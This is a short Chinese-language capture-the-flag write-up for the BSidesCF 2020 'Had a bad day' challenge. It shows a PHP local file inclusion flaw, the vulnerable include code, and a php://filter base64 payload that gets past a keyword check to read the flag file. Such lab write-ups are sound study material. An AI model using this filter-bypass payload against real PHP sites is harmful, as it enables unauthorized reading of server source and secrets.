[BSidesCF 2020]Had a bad day

先看url，发现可能有注入

http://655c742e-b427-485c-9e15-20a1e7ef1717.node5.buuoj.cn:81/index.php?category=woofers

试试能不能查看index.php直接?category=index.php不行，试试伪协议

把.php去掉试试

base64解码

    <?php
                $file = $_GET['category'];
​
                if(isset($file))
                {
                    if( strpos( $file, "woofers" ) !==  false || strpos( $file, "meowers" ) !==  false || strpos( $file, "index")){
                        include ($file . '.php');
                    }
                    else{
                        echo "Sorry, we currently only support woofers and meowers.";
                    }
                }
                ?>

说明参数要包含woofers、meowers、index

试试读取flag文件

?category=php://filter/convert.base64-encode/index/resource=flag

base64解码